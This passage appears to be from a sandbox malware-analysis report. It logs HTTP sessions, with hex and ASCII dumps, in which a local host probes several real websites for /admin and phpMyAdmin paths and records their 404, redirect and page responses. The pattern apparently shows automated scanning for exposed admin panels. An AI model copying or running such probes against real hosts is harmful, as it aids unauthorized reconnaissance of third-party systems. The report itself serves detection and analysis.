0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000364065 CET1286INData Raw: 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000406981 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000426054 CET1286INData Raw: 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f="http://innovationdevelopment.eu/pl/PhpMyAdmin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/PhpMyAdmin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/PhpMyAdmin/" />
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000442028 CET1286INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 61 6a 61 78 27 29 2e 73 72 63 3d 27 73 69 74 65 73 2f 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cument.getElementById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000458956 CET1286INData Raw: 49 6e 6e 6f 6d 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 49 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Innome"><img src="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000631094 CET1286INData Raw: 63 72 65 65 6e 5f 73 69 7a 65 73 2e 70 68 70 3f 77 3d 27 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 26 68 3d 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: creen_sizes.php?w='+screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetC
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000648975 CET1286INData Raw: 20 63 61 6c 6c 65 64 20 61 20 63 6f 6f 6b 69 65 20 28 63 6f 6f 6b 69 65 73 29 20 6d 61 79 20 70 6c 61 63 65 20 64 75 72 69 6e 67 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: called a cookie (cookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Stora
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000665903 CET1286INData Raw: 73 69 63 20 73 65 74 74 69 6e 67 20 63 6f 6f 6b 69 65 73 2c 20 62 75 74 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 74 68 65 6d 20 62 79 20 74 68 65 20 75 73 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sic setting cookies, but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.000682116 CET1286INData Raw: 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 50 61 72 74 6e 65 72 73 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="footer_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.023164988 CET830INData Raw: 6f 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 32 39 70 78 3b 20 77 69 64 74 68 3a 32 39 70 78 22 20 2f 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: o.png" style="height:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                354192.168.2.661887181.4.228.15580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.716140985 CET182OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.977626085 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.977643967 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                355192.168.2.661944138.66.39.20580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.744514942 CET184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.976286888 CET120INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                356192.168.2.661926181.4.228.15580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.758858919 CET188OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.026426077 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.026443958 CET151INData Raw: 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                357192.168.2.66237344.195.133.14580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.774202108 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.889241934 CET582INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                358192.168.2.662369104.18.41.15380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.774267912 CET172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.920644999 CET311INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
